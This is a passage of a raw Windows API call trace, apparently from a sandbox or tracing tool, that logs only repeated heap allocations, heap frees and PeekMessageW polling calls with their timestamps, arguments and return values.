(HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01958 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019a8 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019b8 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.523] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.523] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019c8 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.523] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.523] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01998 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.524] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019a8 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.524] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.524] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.524] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.524] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0257.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0257.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.525] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.525] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.525] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.525] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.525] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.525] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.525] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.526] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.527] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.528] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.529] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW 